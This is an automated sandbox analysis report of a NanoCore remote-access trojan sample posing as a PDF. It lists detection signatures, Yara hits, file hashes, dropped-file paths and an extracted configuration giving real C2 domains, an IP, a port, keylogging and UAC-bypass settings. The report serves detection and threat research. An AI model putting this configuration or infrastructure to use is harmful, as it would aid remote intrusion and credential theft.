Windows Analysis Report
004349256789197.pdf.scr.exe

Overview

General Information

Sample Name: 004349256789197.pdf.scr.exe
Analysis ID: 798041
MD5: 3ac05bbe35293fbfd0df49ecfb34c461
SHA1: ee12d93ac5f81036e920bb8c05638aa4e6c1f3bf
SHA256: 576263fb3c88934ebdb0aa6071f3a980710c9dfd2a3d63d09b0aa76f1caac9e7
Tags: exe
Infos:

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: december2nd.ddns.net Avira URL Cloud: Label: malware
Source: december2n.duckdns.org Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Avira: detection malicious, Label: DR/AutoIt.Gen
Yara detected Nanocore RAT
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
Multi AV Scanner detection for submitted file
Source: 004349256789197.pdf.scr.exe ReversingLabs: Detection: 44%
Source: 004349256789197.pdf.scr.exe Virustotal: Detection: 39% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe ReversingLabs: Detection: 26%
Antivirus or Machine Learning detection for unpacked file
Source: 22.2.RegSvcs.exe.720000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 10.2.RegSvcs.exe.6210000.7.unpack Avira: Label: TR/NanoCore.fadte
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Uses 32bit PE files
Source: 004349256789197.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 004349256789197.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_003DA69B
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_003EC220
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FB348 FindFirstFileExA, 0_2_003FB348
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00C0E387
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00C0D836
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00C1A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00C1A488
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose, 6_2_00C165F1
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDC642 FindFirstFileExW, 6_2_00BDC642
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 6_2_00C172E9
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C17248 FindFirstFileW,FindClose, 6_2_00C17248

Networking
barindex
Uses dynamic DNS services
Source: unknown DNS query: name: december2n.duckdns.org
Source: unknown DNS query: name: december2nd.ddns.net
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: december2n.duckdns.org
Source: Malware configuration extractor URLs: december2nd.ddns.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPD-NETTR SPD-NETTR
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 212.193.30.230 212.193.30.230
Source: Joe Sandbox View IP Address: 212.193.30.230 212.193.30.230
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49714 -> 212.193.30.230:60705
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown DNS traffic detected: queries for: december2n.duckdns.org
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 6_2_00C0A54A
Installs a raw input device (often for capturing keystrokes)
Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud
barindex
Yara detected Nanocore RAT
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
